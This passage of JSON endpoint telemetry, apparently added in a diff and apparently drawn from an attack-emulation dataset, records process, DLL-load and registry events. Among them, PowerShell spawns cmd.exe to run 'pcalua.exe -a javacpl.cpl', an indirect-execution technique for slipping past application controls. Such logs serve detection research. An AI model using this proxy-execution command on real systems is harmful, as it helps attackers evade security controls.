"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883574013869984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883574013869984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574013869984, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574013869984, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", 
+ "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574013869984, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "process", + "pid": 7060, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883574013869984, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"pcalua.exe -a C:\\Windows\\system32\\javacpl.cpl\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3920, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883574014000000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574013960000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574013960000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 
3920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574013960000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574013960000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" + }, + { + "event_type": "file", + "file_name": "PCALUA.EXE-5EB8CBC1.pf", + "file_path": "C:\\Windows\\Prefetch\\PCALUA.EXE-5EB8CBC1.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883574013960000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3920, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574014050000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" + }, + { + "event_type": "registry", + "pid": 3920, + "process_name": "cmd.exe", + "process_path": "C:\\WINDOWS\\system32\\cmd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883574014050000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716D5701}" + }, + { + "command_line": "pcalua.exe -a C:\\Windows\\system32\\javacpl.cpl", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 
7392, + "ppid": 3920, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "subtype": "create", + "timestamp": 131883574014090000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}", + "unique_ppid": "{42FC7E13-CC19-5C05-0000-0010716D5701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "pcalua.exe", + "image_path": "C:\\Windows\\System32\\pcalua.exe", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014050000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014050000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014050000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014050000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014050000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + 
"image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + 
"pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 7392, + "process_name": "pcalua.exe", + 
"process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 
131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014140000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "pcaui.dll", + "image_path": "C:\\Windows\\System32\\pcaui.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014230000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014230000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014230000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "comctl32.dll", + "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014230000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "dui70.dll", + "image_path": "C:\\Windows\\System32\\dui70.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 
131883574014230000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "wer.dll", + "image_path": "C:\\Windows\\System32\\wer.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014230000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014230000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014320000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", + "registry_value": "W32:0000000000040570", + "timestamp": 131883574014320000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574014320000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "image_load", + "image_name": "msctf.dll", + "image_path": "C:\\Windows\\System32\\msctf.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014320000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014320000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574014320000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574014320000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574014320000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + 
"event_type": "image_load", + "image_name": "TextInputFramework.dll", + "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014400000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "CoreUIComponents.dll", + "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014400000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "CoreMessaging.dll", + "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014400000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014400000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014400000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014400000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + 
"image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014490000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574014490000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014490000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014590000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "registry", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883574014590000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "ndfapi.dll", + "image_path": 
"C:\\Windows\\System32\\ndfapi.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014590000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014590000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "wdi.dll", + "image_path": "C:\\Windows\\System32\\wdi.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014590000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014590000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "duser.dll", + "image_path": "C:\\Windows\\System32\\duser.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014660000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "xmllite.dll", + "image_path": "C:\\Windows\\System32\\xmllite.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014700000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "image_load", + "image_name": "atlthunk.dll", + "image_path": "C:\\Windows\\System32\\atlthunk.dll", + "pid": 7392, + "process_name": "pcalua.exe", + "process_path": 
"C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574014750000, + "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_value": "Journal", + "timestamp": 131883574014940000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", + "registry_value": "Render", + "timestamp": 131883574014940000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", + "registry_value": "W32:00000000000305D2", + "timestamp": 131883574015119984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": 
